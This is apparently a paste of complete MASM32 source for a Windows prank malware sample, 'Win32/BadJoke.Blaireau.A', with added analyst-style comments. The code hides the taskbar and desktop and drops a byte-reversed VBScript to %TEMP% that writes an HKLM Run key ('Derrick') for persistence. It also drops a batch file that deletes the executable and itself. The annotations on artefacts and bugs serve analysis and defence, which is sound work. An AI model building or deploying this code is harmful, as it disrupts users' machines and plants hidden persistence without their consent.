Xylitol

Win32/BadJoke.Blaireau.A

Jul 16th, 2014
; Name: Win32/BadJoke.Blaireau.A
; Code: Xylitol - xylitol☆temari.fr
; Size: 3Kb - 4b4726c7a9126b151d177f7c789f90bd
; Test: Windows XP SP3
; Date: 16/06/2014
; Desc: Hide the taskbar, drop a VBS and self-destruct
; This source is considered dangerous although it will not harm your computer.
; This was done for fun and entertainment purposes only.

;MAKE.BAT:
;@echo off
;set path=\masm32\bin
;set lib=\masm32\lib
;set name=Blaireau
;set rsrc=rsrc
;ml.exe /c /coff "%name%".asm
;link.exe /SUBSYSTEM:WINDOWS /opt:nowin98 /LIBPATH:"%lib%" "%name%".obj
;del *.OBJ
;pause
;@echo on
;cls
  22.  
  23. ; #########################################################################
  24.  
; Assembler setup: 32-bit flat model, stdcall (the Win32 API convention
; used by every invoke below), case-sensitive symbols so the imported
; API names from the masm32 includes resolve exactly.
      .386
      .model flat, stdcall
      option casemap :none   ; case sensitive
  28.  
  29. ; #########################################################################
  30.  
  31.       include \masm32\include\windows.inc
  32.       include \masm32\include\user32.inc
  33.       include \masm32\include\kernel32.inc
  34.       include \masm32\include\shell32.inc
  35.       include \masm32\macros\macros.asm
  36.      
  37.       includelib \masm32\lib\shell32.lib
  38.       includelib \masm32\lib\user32.lib
  39.       includelib \masm32\lib\kernel32.lib
  40.  
  41. ; #########################################################################
  42.  
; Uninitialised working storage.
; None of the 512-byte buffers is bounds-checked: lstrrev writes
; ecx+1 bytes into szReversed, and payload receives payload2 + the
; reversed temp path + payload1 (roughly 300 bytes of script plus a
; temp path that GetTempPath may fill up to 255 chars), so a long
; %TEMP% overruns these buffers.
.data?
szlen       dd      ?                ; byte count handed to WriteFile
szReversed  db      512 dup(?)       ; output of lstrrev (reversed path, later the reversed script)
tmpFilePath     db      512 dup(?)   ; %TEMP% path + "Blaireau.vbs"
payload     db      512 dup(?)       ; script assembled in reversed form before the final lstrrev
  48.  
; Initialised data. The VBScript body is stored byte-reversed and is
; flipped back by lstrrev at run time (a trivial string obfuscation;
; the plain text is easily recovered by reversing each db line).
.data
shell       db "Shell_TrayWnd",0     ; window class hidden first (the taskbar, per the header Desc)
explorer    db "Progman",0           ; window class hidden second (the desktop window)
Filename    db "Blaireau.vbs",0      ; dropped script name, appended to the temp path
Filename2   db "Blaireau.bat",0      ; self-delete batch, written relative to the current directory

; payload1, read backwards line by line from the bottom: creates a
; Scripting.FileSystemObject and a WScript.Shell, turns on
; "On Error Resume Next", then calls RegWrite on
; HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Derrick
; with the value "wscript <temp path>" (the path is spliced in by start).
; This is a logon-persistence entry for the dropped .vbs; the Run value
; name "Derrick" and the %TEMP%\Blaireau.vbs file are the artefacts to
; look for. Writing under HKLM needs admin rights; failures are hidden
; by the On Error Resume Next line.
payload1    db " tpircsw",022h,",",022h,"kcirreD\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\ENIHCAM_LACOL_YEKH",022h," etirWgeR.tideger",13,10
        db ")",022h,"llehS.tpircSW",022h,"(tcejbOetaerC = tideger teS",13,10
        db ")1(redloFlaicepSteG.osf = metsysrid teS",13,10
        db "txeN emuseR rorrE nO",13,10
        db ")",022h,"tcejbOmetsySeliF.gnitpircS",022h,"(tcejbOetaerC = osf teS",13,10
        db "metsysrid ,osf miD",0

; payload2 reversed is the closing quote of the RegWrite value followed
; by a Msgbox "T Niké" line (the visible "joke" part of the script).
payload2    db 022h,"ékiN T",022h," xobgsM",13,10
            db 022h,0

; melt: plain (not reversed) batch file. Loops until "blaireau.exe" in
; the current directory can be erased (only possible after ExitProcess
; releases the image), then removes itself. It assumes the running
; binary is literally named blaireau.exe and lives in the current
; directory. NOTE(review): the "erase" line for blaireau.exe has no
; closing quote; cmd appears to tolerate it but it looks unintended.
melt        db ":repeat",13,10
        db "if not exist ",022h,"blaireau.exe",022h," goto exit",13,10
        db "attrib -R -S -H ",022h,"blaireau.exe",022h,13,10
        db "erase ",022h,"blaireau.exe",13,10
        db "goto repeat",13,10
        db ":exit",13,10
        db "attrib -R -S -H ",022h,"Blaireau.bat",022h,13,10
        db "erase ",022h,"Blaireau.bat",022h,0
  73.  
.code
;-----------------------------------------------------------------------
; start — process entry point (named in "end start").
; Builds the temp-file path and the reversed script, then falls straight
; through into DlgProc below: there is no jmp/call/ret here, so DlgProc's
; generated prologue runs next and its "parameters" are never supplied.
; Register contract for lstrrev: esi = source, ecx = length, result in
; szReversed. Return values of GetTempPath/lstrlen are not checked; a
; zero length would make lstrrev underflow ecx (see lstrrev).
;-----------------------------------------------------------------------
start:
        invoke GetTempPath, 255,addr tmpFilePath          ; tmpFilePath = %TEMP%\ (max 255 chars)
        invoke lstrcat,addr tmpFilePath,addr Filename     ; tmpFilePath = %TEMP%\Blaireau.vbs

        invoke lstrlen, addr tmpFilePath
        mov ecx,eax
        mov esi, offset tmpFilePath
        call lstrrev                                      ; szReversed = reverse(tmpFilePath)

        ; payload = payload2 + reverse(path) + payload1, so that one more
        ; reversal in DlgProc yields the script with the real path embedded.
        invoke lstrcpy,addr payload,addr payload2
        invoke lstrcat,addr payload,addr szReversed
        invoke lstrcat,addr payload,addr payload1

  87.        
;-----------------------------------------------------------------------
; DlgProc — despite the dialog-procedure signature it is never invoked
; as one: nothing in this file calls it, execution simply falls in from
; start. hWin/uMsg/wParam/lParam therefore hold whatever happens to be
; on the stack; hWin is passed to ShellExecute as the parent window.
; Steps: hide the taskbar and desktop windows, reverse the assembled
; payload into the real VBScript, write it to %TEMP%\Blaireau.vbs,
; write the self-delete batch next to the exe, launch both (the .vbs
; visibly through its registered handler, the .bat hidden) and exit so
; the batch can erase the image.
; No API result is checked: CreateFile may return INVALID_HANDLE_VALUE
; and WriteFile's status is ignored.
; NOTE(review): as pasted, the "DlgProc proc" line has no trailing comma
; before the parameter lines, which MASM needs for continuation — most
; likely lost in the paste.
;-----------------------------------------------------------------------
DlgProc proc
        hWin    :DWORD,
        uMsg    :DWORD,
        wParam  :DWORD,
        lParam  :DWORD
    LOCAL   hFile   :DWORD,
        NumBytes:DWORD

; Hide the taskbar (Shell_TrayWnd) and the desktop (Progman) windows.
invoke FindWindow,addr shell,NULL ;  Get handle first then hide it.
.if eax != 0
    invoke ShowWindow,eax,SW_HIDE ; use SW_SHOW to show it again
.endif
invoke FindWindow,addr explorer,NULL
.if eax != 0
invoke ShowWindow,eax,SW_HIDE
.endif

        ; szReversed = reverse(payload) = the plain VBScript text.
        invoke lstrlen, addr payload
        mov ecx,eax
        mov esi, offset payload
        call lstrrev

        invoke lstrlen,addr szReversed
        mov szlen,eax

        ; Drop the script: CREATE_ALWAYS overwrites any existing file.
        invoke CreateFile,addr tmpFilePath,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
        mov hFile,eax
        invoke WriteFile, hFile,addr szReversed, szlen, addr NumBytes, NULL

        invoke CloseHandle,hFile
        mov szlen,0

        invoke lstrlen,addr melt
        mov szlen,eax

        ; Drop the batch file; Filename2 is relative, so it lands in the
        ; current directory, which the batch also assumes holds blaireau.exe.
        invoke CreateFile,addr Filename2,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
        mov hFile,eax
        invoke WriteFile, hFile,addr melt, szlen, addr NumBytes, NULL
        invoke CloseHandle,hFile
        mov szlen,0

        ; "open" verb: the .vbs runs through the registered script host,
        ; the .bat is started hidden. chr$() is the masm32 literal macro.
        invoke ShellExecute,hWin,chr$("open"),addr tmpFilePath,NULL,NULL,SW_SHOWNORMAL
        invoke ShellExecute,hWin,chr$("open"),addr Filename2,NULL,NULL,SW_HIDE
        push 0
        call ExitProcess                ; exit code 0; releases the image for the batch to erase

DlgProc endp
  135.  
;-----------------------------------------------------------------------
; lstrrev — copy a string into szReversed back to front.
; In:    esi = source buffer, ecx = byte count (must be >= 1)
; Out:   szReversed = reversed bytes followed by a NUL
; Clobb: al, ebx, ecx, edi, flags (ebx/edi are callee-saved under the
;        Win32 ABI, but this routine is only reached by the internal
;        "call lstrrev" sites in this file)
; No bounds check against szReversed's 512 bytes. With ecx = 0 the
; "dec ecx" wraps to 0FFFFFFFFh and the loop runs off both buffers,
; so callers must never pass an empty string.
;-----------------------------------------------------------------------
lstrrev proc
    lea edi, offset szReversed          ; edi = destination
    xor ebx, ebx                        ; ebx = destination index
        Reversor:
            mov al, byte ptr[esi+ecx-1] ; read from the tail of the source
            mov byte ptr[edi+ebx], al   ; write at the head of the destination
            inc ebx
            dec ecx
        jnz Reversor                    ; until all ecx bytes are copied
            mov byte ptr[edi+ebx], 0    ; NUL-terminate
    Ret
lstrrev endp
  148.  
  149. end start